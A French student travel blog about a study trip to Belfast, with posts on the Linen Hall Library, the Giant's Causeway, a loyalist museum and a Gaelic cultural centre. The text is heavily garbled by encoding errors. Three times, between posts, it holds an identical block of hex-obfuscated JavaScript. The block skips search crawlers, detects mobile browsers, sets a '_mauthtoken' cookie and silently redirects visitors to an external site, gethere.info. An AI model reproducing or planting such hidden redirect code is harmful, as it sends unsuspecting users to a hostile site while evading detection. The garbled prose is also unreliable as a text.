Tous les articles par belfasteditorialteam

Ce profil rassemble l'ensemble des étudiants ayant pris part au voyage d'étude.

Linen Hall Library

Par Chantal Vetter

La visite de la Linen Hall Library nous a peu A� peu fait entrer dans la��histoire du conflit. FondA�e en 1788 par la Belfast Reading Society, elle est la plus ancienne bibliothA?que de la ville.

Notre groupe sa��est sA�parA� pour faire un tour guidA�, proposA� par deux bA�nA�voles. En montant A� la��A�tage supA�rieur, nous sommes passA�s A� cA?tA� da��une collection da��affiches qui nous a donnA� un aperA�u des slogans utilisA�s durant la pA�riode des Troubles. Les affiches font partie de la collection Troubled Images. Elles ont A�tA� sA�lectionnA�es parmi plus de 3a��500 posters. Leur aspect graphique et visuel ainsi que les A�crits reflA?tent les discours de cette pA�riode. La collection a dA�jA� A�tA� prA?tA�e aux USA, au pays Basque et A� la Cisjordanie, ces deux derniA?res rA�gions A�tant elles-mA?mes liA�es A� un conflit identitaire.

Troubled Images Collection, Chantal Vetter, 29.02.2016, Linen Hall library, Belfast

Notre deuxiA?me guide nous a ensuite montrA� la collection la plus originale de la bibliothA?que qui est la Northern Ireland Political Collection, originale car elle ne rassemblent pas seulement des documents A�crits comme on pourrait sa��y attendre mais aussi de nombreux objets instrumentalisA�s par les acteurs du conflit et elle est la seule en son genre. Tout a commencA� en 1969, lorsque Jimmy Vitty, le bibliothA�caire de la��A�poque, a gardA� un tract pour les Civils Rights qua��il avait reA�u dans un bar. Depuis, plus de 350a��000 objets et A�crits concernant le conflit, da��origine rA�publicaine mais aussi da��origine loyaliste, ont A�tA� rassemblA�s dans la��espace politiquement neutre de la Linen Hall Library. Entre les statuettes de Ian Paisley et de Gerry Adams qui se font face, une lavette pour bA�bA� et un t-shirt avec Bart Simpson ou encore Bob the Builder affirmant leur loyautA� au Royaume-Uni ou se prononcent pour une Irlande rA�unifiA�e, les anciens livres A�crits en perse perdent de leur importance et le bibliothA�caire A�tait bien convaincu que les souvenirs des Troubles apportent plus aux visiteurs que des pages A�crites en langues inconnues. Ces objets ont A�tA� dA�tournA�s de leur utilitA� quotidienne pour affirmer une position politique et une identitA�, par une rA�appropriation, par exemple, du terme prod, appellation utilisA�e par les Catholiques pour dA�nigrer les Protestants (Cf. lavette et Bart Simpson). Ce sont surtout les loyalistes qui utilisent des personnages populaires, mais Bob the Builder qui, lui, reconstruit les 32 comtA�s et rA�unit ainsi la��Irlande du Nord au reste de la��Irlande semble plutA?t A?tre mobilisA� par les rA�publicains.

Northern Ireland Political Collection, Chantal Vetter, 29.2.2016, Linen Hall Library, Belfast

Les objets probablement les mieux conservA�s de la bibliothA?que A�taient des messages qua��ont A�crits Bobby Sands et un autre prisonnier rA�publicain sur des papiers de cigarettes ou du papier toilette. Les messages A�tant protA�gA�s par le mince film plastique du paquet de cigarettes, ils les faisaient sortir de prison en les passant de bouche A� bouche lors da��un baiser da��adieu. Outre ces objets personnels liA�s aux Troubles, la Northern Ireland Political Collection rassemble aussi plus de 2a��000 pA�riodiques (notamment du Loyalist News et de la��An Phoblacht), les archives de la Northern Ireland Civil Rights Association et de la Northern Ireland Womens Rights Association, des nouvelles, poA�sies et piA?ces de thA�A?tresa��

La Linen Hall Library reste un endroit particulier et joue un grand rA?le pour donner A� ses visiteurs une meilleure comprA�hension du conflit en mettant A� disposition de nombreux documents relatant la vision des deux parties.

Sources:

Linen Hall Library, [en ligne], URLA�: https://www.linenhall.com, ConsultA� le 16.3.2016

Urban Dictionary, [en ligne], URLA�: http://www.urbandictionary.com/define.php?term=Prod, ConsultA� le 14.5.2016

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

La ChaussA�e des GA�ants

Par Sophie Compagnon, Anna Paiuc et Simon Paratte

Formation

La ChaussA�e des gA�ants a�� ou Gianta��s Causeway en anglais a�� est un site gA�ologique composA� de plus de 40a��000 colonnes de basalte. Elles partent de la cA?te de la��Irlande du Nord, plus prA�cisA�ment du plateau da��Antrim, et sa��enfoncent dans la��ocA�an Atlantique.

Ce site trA?s particulier a permis le dA�veloppement des sciences de la terre. En effet, il est A�tudiA� depuis plus de 300 ans et a vu sa��opposer les A�coles franA�aises et anglaises. La��une affirmait que cette formation A�tait due A� des A�lA�ments venant de la terre et la��autre de la��ocA�an. Comme nous allons le voir, ca��est une combinaison des deux qui a crA�A� ce paysage spectaculaire.

Il y a 40 A� 60 millions da��annA�es, durant la��A?re gA�ologique tertiaire, le nord de la��ocA�an Atlantique sa��est sA�parA�, crA�ant une activitA� gA�ologique violente et da��importantes coulA�es de lave. Quand la lave a refroidi, elle sa��est solidifiA�e en roche basaltique et a formA�, par couche successive de basalte, le plateau da��Antrim. Ca��est A� cause de la contraction thermique relativement rapide de la lave que celle-ci a pris la forme de colonnes hexagonales. Au fil du temps, le plateau ca��est aplani A� cause de la��A�rosion provoquA�e par la��ocA�an.

index1

Vue de la ChaussA�e des gA�ants, Sophie Compagnon, 02.03.16, ChaussA�e des gA�ants.

Le mythe

La lA�gende de la crA�ation de la chaussA�e des gA�ants provient de la mythologie celtique irlandaise. Elle raconte que deux gA�ants, Finn MacCool et Benandonner A�taient ennemis jurA�s depuis longtemps, mais ne vivant pas sur la mA?me A�le, ils ne sa��A�taient jamais confrontA�s. En effet, Finn vivait en Irlande alors que Benandonner faisait partie des gA�ants A�cossais.

Un jour, A�nervA�, Finn dA�cida de crA�er un chemin pour dA�fier enfin son ennemi. Pour ce faire, il lanA�a des pierres dans la��eau ce qui donna naissance A� la chaussA�e des gA�ants. Mais il remarqua trA?s vite son erreur en voyant arriver Benandonner, car il A�tait bien plus grand que lui. PaniquA�, Finn rentra chez lui demander de la��aide A� sa femme Oonagh qui eut rapidement la��ingA�nieuse idA�e de dA�guiser son mari en bA�bA� et da��inviter Benandonner chez elle en prA�tendant son mari parti A� la chasse.

Elle prit tout son temps A� mettre en valeur la grandeur et la force de Finn, en indiquant A� Benandonner les A�normes rochers qua��il A�tait capable de lancer, la nourriture dure qua��il adorait manger alors qua��elle cassait les dents au gA�ant A�cossais. Et finalement, Oonagh lui prA�senta Finn dA�guisA� en bA�bA�. Benandonner fA�t effrayA� en voyant le bA�bA� car il imaginait la taille de son pA?re, son ennemi. Il prit la fuite et dA�truit dans son passage la chaussA�e des gA�ants pour A�viter que son ennemi ne vienne le dA�fier en Ecosse.

Il ne resta que le dA�but du passage des deux cA?tA�s, la��un en Irlande qui devint la chaussA�e des gA�ants et la��un en Ecosse qui devint la grotte de Fingal sur la��A�le de Staffa.

Visitor centre

Avant d’arriver A� la ChaussA�e des GA�ants, il faut entrer dans le centre touristique dA�diA� au lieu. EntiA?rement remis A� neuf depuis un incendie, ce centre a A�tA� amA�nagA� afin de s’intA�grer au mieux A� son environnement, en effet son toit est recouvert de verdure et ses parois ressemblent aux colonnes de basalte.
A� l’intA�rieur, une partie du centre propose rafraA�chissements et souvenirs. Une autre partie du centre prA�sente la ChaussA�e des GA�ants, sa formation, sa lA�gende, ainsi que diverses activitA�s interactives afin de se familiariser au lieu.

RenomA�e

La ChaussA�e des GA�ants fait parti du patrimoine mondial de l’UNESCO et est entretenue par le National Trust, qui s’occupe de la conservation et de la valorisation de sites et da��autres monuments se trouvant notamment en Irlande du Nord. Ce prestigieux site, de part son attrait gA�ologique, est A�galement classA� sous d’autres appellations, comme par exemple sous l’ « Areas of Special Scientific Interest (ASSIs) » ou encore comme rA�serve naturelle.

ExpA�rience personnelle

AprA?s avoir visitA� le centre touristique, nous avons rA�cupA�rA� des audio-guides afin de pouvoir avoir des informations tout au long de notre visite.
Nous avons longA� la cA?te du « Portnaboe » jusqu’au « Port Noffer » A� travers un vent tempA�tueux. Le docteure Jennifer McKinley du dA�partement de GA�ologie A� l’UniversitA� de Queen’s nous accompagnait. En chemin nous nous sommes arrA?tA�s A� diffA�rents endroits, oA? elle nous donnait des informations sur la gA�ologie des lieux.
ArrivA�s A� la ChaussA�e des GA�ants, aprA?s avoir eu de la grA?le et de la pluie, nous avons pu profitA� du lieu, prendre des photos, le tout sous le soleil irlandais. Malheureusement, la chaussA�e principale A�tait fermA�e due aux conditions mA�tA�orologiques changeantes.

index

Notre groupe en haut des colonnes de basalte, Sophie Compagnon, 02.03.16, ChaussA�e des gA�ants

Bibliographie

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Une visite au Loyalist Museum a�� Andy Tyrie Interpretive Centre

Par Emilie Guibert et Valentina Ferreira GutiA�rrez

AprA?s avoir passA� une partie de notre sA�jour A� dA�couvrir plusieurs facettes de Belfast, nous avons eu la��opportunitA� da��en explorer une nouvelle, notamment le quartier protestant de East Belfast. Robert, notre chauffeur de bus nous a dA�posA�s devant le A�Loyalist Museum, un musA�e administrA� bA�nA�volement par plusieurs personnes ayant vA�cu la pA�riode des Troubles. Deux da��entre elles nous ont proposA� une visite en deux parties, la premiA?re comprenant un walking tour dans le quartier de East Belfast, et la seconde une visite guidA�e du musA�e. Le soleil na��A�tant pas de la partie, nous avons A�tA� chaleureusement accueilli avec du thA� et du cafA� pour nous rA�chauffer.

Nous avons donc commencA� par une visite guidA�e du quartier da��environ une heure. Un des guides nous a conduits vers les principaux mA�moriaux et murals du quartier en nous explicitant la��aspect symbolique que ces derniers revA?tent pour la communautA� protestante. ParallA?lement, ce dernier nous expliquait le rA?le que les individus reprA�sentA�s sur les fresques ont jouA� lors du conflit, ainsi que le statut des victimes auxquels les mA�moriaux sont dA�diA�s. A�Parfois, il faut avouer que nous avons A�tA� choquA�s par la violence de certaines peintures et slogans. En effet, nous avions la��impression que ces derniers avaient pour but de promouvoir les diffA�rents groupes paramilitaires (notamment la��UYM, UDA, UFF*), ce qui nous a semblA� paradoxal A�tant donnA� le processus de paix initiA� en 1998. A�a�?For as long as one hundred of us remain alive, we shall never in anyway consent to submit to the Irish for ita��s (a��) UDA/UFFa�?. Ces propos figurant sur une des fresques les plus cA�lA?bres du quartier illustre bien la��atmosphA?re de violence encore patente en ce lieu.

Tout au long de la visite, nous avons remarquA� que notre guide utilisait souvent le pronom personnel a�?nousa�? lorsqua��il nous racontait la��histoire du quartier, ce qui peut nous laisser penser que ce dernier a A�tA� impliquA� de maniA?re partisane dans le conflit. Sans vraiment nous transmettre son expA�rience personnelle et son vA�cu, nous pouvions sentir dans ses dires un manque de neutralitA� et da��objectivitA�. Toutefois, ayant entrevu ce que le musA�e contenait, nous pouvions nous attendre A� ce genre de discours plus ou moins partial. MalgrA� cela, nous avons trouvA� cette visite trA?s intA�ressante et complA�mentaire A� ce que nous avons appris auparavant A� propos de Belfast. En effet, nous avions dA�jA� visitA� le quartier protestant de Shankill, mais uniquement A� travers les yeux da��un guide catholique. Ici, le fait da��A?tre accompagnA� par une personne sa��identifiant A� la cause rA�publicaine nous a permis da��accA�der A� un autre point de vue du conflit.

AprA?s une heure de marche dans le froid de Belfast, nous sommes passA�s A� la deuxiA?me partie du programme, A� savoir la visite du musA�e. Les objets y figurant A�taient tous liA�s A� la pA�riode des Troubles. La��abondance da��armes, da��articles relatant les crimes perpA�trA�s par la��IRA** et les mannequins revA?tant les uniformes militaires de la��UFF et de la��UDA nous ont plongA�s de maniA?re indirecte dans la��atmosphA?re violente du conflit.

Tout au long de notre visite, nous avons parfois eu la��impression da��assister A� une sorte de a�?performance identitairea�? de la part de nos deux guides, comme si ces derniers tentaient de promouvoir la cause loyaliste auprA?s des visiteurs. MalgrA� cela, connaA�tre les deux versions du conflit nous a permis da��avoir une vision plus globale des Troubles. GrA?ce A� toutes les informations que nous avons assimilA�es A� travers nos diverses expA�riences, nous pouvons maintenant adopter une pensA�e plus critique et objective du conflit ayant sA�vit A� Belfast. Au cours de notre voyage, divers points de vue nous ont A�tA� transmis. La��hA�tA�rogA�nA�itA� de ces derniers nous a conduit A� considA�rer la pA�riode des Troubles avec un certain recul. Or, cette distanciation sa��avA?re nA�cessaire dans le cadre da��une analyse neutre et acadA�mique.

*UYM: Ulster Youg Militance / UFF: Real Ulster Freedom Fighters / UDA: Ulster Defense Association

** IRA: Real Irish Republican Army

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Une visite au centre gaA�lique CultA?rlann McAdam A� Fiaich

Par Laetitia Valentin et Christina Zholdokova

Mardi 1er mars 2016, aux alentours de midi, nous venions tout juste de terminer la visite en Black Cab et nous avons A�tA� dA�posA�s par ceux-ci devant le centre gaA�lique CultA?rlann McAdam A� Fiaich sur Falls Road.

Ce centre culturel est installA� dans une ancienne A�glise presbytA�rienne A� laquelle une nouvelle aile a A�tA� rattachA�e pour A�tablir une galerie da��art. Nous avons da��abord eu le plaisir de manger au cafA� du centre se trouvant dans le hall da��entA�e au rez-de-chaussA�e. Nous avons A�tA� surpris de recevoir un menu bilingue gaA�lique da��un cA?tA�, anglais de la��autre. En fait, le centre cherche A� faire perdurer la culture irlandaise principalement par le biais de la langue gaA�lique. Pour ce faire, il organise des sA�ances de thA�A?tre, offre la possibilitA� de prendre des cours, soit da��initiation, soit de perfectionnement de la langue gaA�lique, vend des livres autours de la culture irlandaise tant en gaA�lique qua��en anglais. Il propose A�galement des bijoux et da��autres petits articles en lien avec la culture irlandaise et organise des expositions de tableaux ayant pour thA?me les paysages da��Irlande.

Nous avons eu droit A� une confA�rence de la part da��un membre du CultA?lann McAdam A� Fiaich nous expliquant les butes de ce centre. Ils affirment A?tre ouvert A� tous, da��ailleurs, ils invitent A�galement les protestants A� venir voir les spectacles. Leurs objectifs sont donc purement culturels. Cela dit, nous avons tout de mA?me appris durant cette confA�rence qua��un clivage langagier et culturel persiste entre catholiques et protestants. En effet, les enfants catholiques apprennent le gaA�lique A� la��A�cole alors que les enfants protestants na��apprennent que la��anglais et en raison de ce clivage, il est da��autant plus difficile da��attirer des Unionistes dans un centre qui prA?ne les valeurs irlandaises. MalgrA� cette sA�paration persistante entre les deux cultures, un pas de plus vers la paix et la��ouverture A� la culture irlandaise est effectuA� par le centre.

Nous avons A�galement reA�u un petit dA�pliant traduisant de la��anglais au gaA�lique les expressions de tous les jours les plus courantes (A� voir ci-dessous)

Fun facts:

– AprA?s les rA�novations apportA�es en 2011 A� l’ancienne A�glise presbytA�rienne abritant le centre de culture CultA?rlann McAdam A� Fiaich, une galerie d’art sous le nom de Gerard Dillon est ouverte.

– Seule Marie Louise Gormley, artiste crA�ant des images en feutre, assemblA�es A� la machine A� coudre A� partir de soies teintes A� la main et de fils A� broder, est reprA�sentA�e A� la galerie d’art pour le moment.

– La galerie n’est pas seulement un lieu d’exposition, mais A�galement d’achat, A�tant donnA� que des prix figurent sur une partie des A�uvres, permettant un soutien aux artistes locaux.

– Un espace comportant des panneaux tactiles interactifs est prA�sent dans cette nouvelle aile du centre et permet d’acquA�rir des connaissances sur la toponymie des lieux, la poA�sie, la littA�rature, le langage, l’histoire, ainsi que d’autres aspects de la culture irlandaise.

– La collection de livres en vente dans la boutique du rez-de-chaussA�e a longtemps voyagA� de librairie en librairie, avant de finalement A?tre A�tablie de maniA?re permanente au centre CultA?rlann McAdam A� Fiaich. Cette librairie est dite la plus complA?te et diversifiA�e d’Irlande du Nord, regroupant des ouvrages traitant uniquement de la culture et de la vie irlandaises.

– De petits concerts de musique irlandaise jouA�e par des artistes locaux sont organisA�s au sein du restaurant situA� en face de la boutique, au rez-de-chaussA�e.

– Les activitA�s proposA�es par le centre CultA?rlann McAdam A� Fiaich comportent mA?me des cours de bodhran, un instrument de percussion utilisA� dans la musique irlandaise, dA�couvert lors de ce qu’on appelle la « RA�volution Celtique » des annA�es 1960, ne servant auparavant que d’objet rituel lors de rites religieux.

DA�pliant traduction anglais – gaA�lique

 

Bibliographie

Article:
